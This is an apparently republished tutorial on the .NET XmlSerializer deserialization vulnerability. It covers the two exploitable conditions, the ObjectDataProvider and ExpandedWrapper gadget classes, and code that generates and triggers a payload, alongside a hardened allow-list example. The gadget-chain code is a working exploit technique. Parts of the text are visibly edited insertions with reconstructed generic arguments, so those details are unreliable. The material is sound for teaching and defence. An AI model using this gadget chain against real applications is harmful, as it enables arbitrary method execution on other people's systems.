Example Analysis of .net deserialization vulnerability XmlSerializer

2025-01-22 Update From: SLTechnology News&Howtos (Network Security)


Shulou(Shulou.com)05/31 Report--

This article walks through a worked example of the .NET deserialization vulnerability in XmlSerializer: the two conditions that make it exploitable, the two gadget classes involved, and the code that generates and triggers the payload.

Conditions (both must hold):

1. When the serializer is constructed, the type is attacker-controllable: new XmlSerializer(type), with type taken from untrusted input.

2. When deserializing, the input is attacker-controllable: serializer.Deserialize(fi), with fi (the XML stream) taken from untrusted input.
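The following is an added defensive illustration of those two conditions, not code from the original article. It puts the vulnerable pattern (both the type name and the XML come from the request) next to a hardened version (type fixed at compile time, or mapped through an explicit allow-list, and the XmlReader locked down). The Order class, the "order" discriminator and the sample XML are constructed for the example.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

// Constructed sample DTO: the only type this endpoint is ever expected to receive.
public sealed class Order
{
    public int Id { get; set; }
    public string Sku { get; set; }
}

public static class XmlDeserialization
{
    // VULNERABLE: condition 1 and condition 2 both hold.
    // Type.GetType() resolves any loaded type by name, so a request naming
    // ObjectDataProvider/ExpandedWrapper plus matching XML reaches the gadget path.
    public static object LoadUntrusted(string typeName, string xml)
    {
        var serializer = new XmlSerializer(Type.GetType(typeName)); // condition 1: type controllable
        using var reader = new StringReader(xml);
        return serializer.Deserialize(reader);                        // condition 2: input controllable
    }

    // HARDENED: the type is a compile-time constant, so condition 1 no longer holds
    // even though the XML itself is still untrusted. The reader also refuses DTDs
    // and external resolution, which closes the usual XML-side issues (XXE, entity blowup).
    public static Order LoadOrder(string xml)
    {
        var serializer = new XmlSerializer(typeof(Order));
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null,
        };
        using var reader = XmlReader.Create(new StringReader(xml), settings);
        return (Order)serializer.Deserialize(reader);
    }

    // If the wire format genuinely carries a type discriminator, map it through a
    // closed allow-list instead of handing the string to Type.GetType().
    private static readonly Dictionary<string, Type> AllowedTypes = new()
    {
        ["order"] = typeof(Order),
    };

    public static object LoadAllowListed(string discriminator, string xml)
    {
        if (!AllowedTypes.TryGetValue(discriminator, out var type))
            throw new InvalidOperationException($"Rejected type discriminator '{discriminator}'.");

        var serializer = new XmlSerializer(type);
        var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
        using var reader = XmlReader.Create(new StringReader(xml), settings);
        return serializer.Deserialize(reader);
    }

    public static void Main()
    {
        // Constructed sample input for the hardened paths.
        const string xml = "<Order><Id>42</Id><Sku>ABC-1</Sku></Order>";

        var order = XmlDeserialization.LoadOrder(xml);
        Console.WriteLine($"LoadOrder: Id={order.Id} Sku={order.Sku}");

        var viaList = (Order)XmlDeserialization.LoadAllowListed("order", xml);
        Console.WriteLine($"LoadAllowListed: Id={viaList.Id}");

        // A discriminator naming anything outside the allow-list is rejected before
        // any XmlSerializer is constructed, so the gadget types are never reachable.
        try
        {
            XmlDeserialization.LoadAllowListed("System.Data.Services.Internal.ExpandedWrapper", xml);
        }
        catch (InvalidOperationException ex)
        {
            Console.WriteLine($"Rejected: {ex.Message}");
        }
    }
}
```

The detection counterpart is to search the code base for `new XmlSerializer(` whose argument is not a `typeof(...)` literal; every such call site needs the allow-list treatment or a justification.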

Two key classes: ObjectDataProvider and ExpandedWrapper

    // PresentationFramework.dll v4.0.0.0
    System.Windows.Data.ObjectDataProvider

    // System.Data.Services.dll v4.0.0.0
    System.Data.Services.Internal.ExpandedWrapper

Payload generation (the missing semicolon, the capitalised "Public", and the generic arguments of ExpandedWrapper have been restored; the generic arguments were stripped by HTML extraction and are reconstructed from the assignments below):

    using System.IO;
    using System.Xml.Serialization;
    using System.Windows.Data;                 // ObjectDataProvider
    using System.Data.Services.Internal;       // ExpandedWrapper

    public static void serializeObjectWithXmlSer()
    {
        // ExpandedWrapper<TExpandedElement, TProperty0>: ProjectedProperty0 is of type
        // TProperty0, so the second argument must be ObjectDataProvider for the
        // assignment below to compile; the first is taken to be the author's Class2.
        ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2, ObjectDataProvider>();
        XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));

        // ObjectDataProvider invokes MethodName on ObjectInstance with MethodParameters
        // when its properties are populated, which is what happens during Deserialize.
        eobj.ProjectedProperty0 = new ObjectDataProvider();
        // Class2 is the author's own helper class (not shown in the article); it
        // exposes a writeFile(string, string) method used as the demo target.
        eobj.ProjectedProperty0.ObjectInstance = new Class2();
        eobj.ProjectedProperty0.MethodName = "writeFile";
        eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
        eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

        // Write the serialized gadget to disk; this file is the payload.
        TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
        serializer.Serialize(fo, eobj);
        fo.Close();
    }

Trigger payload (this is the sink: the type passed to the constructor and the file passed to Deserialize are exactly the two controllable inputs from the conditions above):

    using System.IO;
    using System.Xml.Serialization;
    using System.Windows.Data;
    using System.Data.Services.Internal;

    public static void deserializeObjectWithXmlSer()
    {
        // Same generic type as used for serialization; in a real application this
        // type name would be the attacker-controlled value.
        XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
        TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
        ser.Deserialize(fi);   // populating ObjectDataProvider runs Class2.writeFile("xxxxx", "ser.txt")
        fi.Close();
    }

That is the whole of the example analysis of the .NET deserialization vulnerability in XmlSerializer. Thank you for reading.
